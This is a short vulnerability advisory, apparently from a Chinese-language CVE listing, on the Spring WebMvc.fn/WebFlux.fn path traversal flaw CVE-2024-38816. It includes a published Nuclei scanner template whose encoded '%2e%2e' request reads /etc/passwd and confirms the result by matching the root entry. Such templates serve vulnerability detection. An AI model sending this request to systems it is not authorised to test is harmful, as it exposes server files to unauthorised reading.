CVE-2024-38816: WebMvc.fn/WebFlux.fn - Path Traversal

日期: 2025-08-01 | 影响软件: WebMvc.fn WebFlux.fn | POC: 已公开

漏洞描述

Applications serving static resources through the functional web frameworks WebMvc.fn or WebFlux.fn are vulnerable to path traversal attacks. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible to the process in which the Spring application is running.

PoC代码[已公开]

id: CVE-2024-38816

info:
  name: WebMvc.fn/WebFlux.fn - Path Traversal
  author: pussycat0x
  severity: high
  description: |
    Applications serving static resources through the functional web frameworks WebMvc.fn or WebFlux.fn are vulnerable to path traversal attacks. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible to the process in which the Spring application is running.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-38816
    - https://github.com/masa42/CVE-2024-38816-PoC
    - https://spring.io/security/cve-2024-38816
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-38816
    epss-score: 0.93374
    epss-percentile: 0.99809
  tags: cve,cve2024,spring,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/static/link/%2e%2e/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: regex
        part: content_type
        regex:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ff8d9494a9f6fbe7a572c8d1b8c19daeeef7f11f34622c8736fd3a410f48787302204aa3f91bc748bbeced363bf6ec60c7e0bdbd9698dce080ff0e096bd7a46ac44a:922c64590222798bb761d5b6d8e72950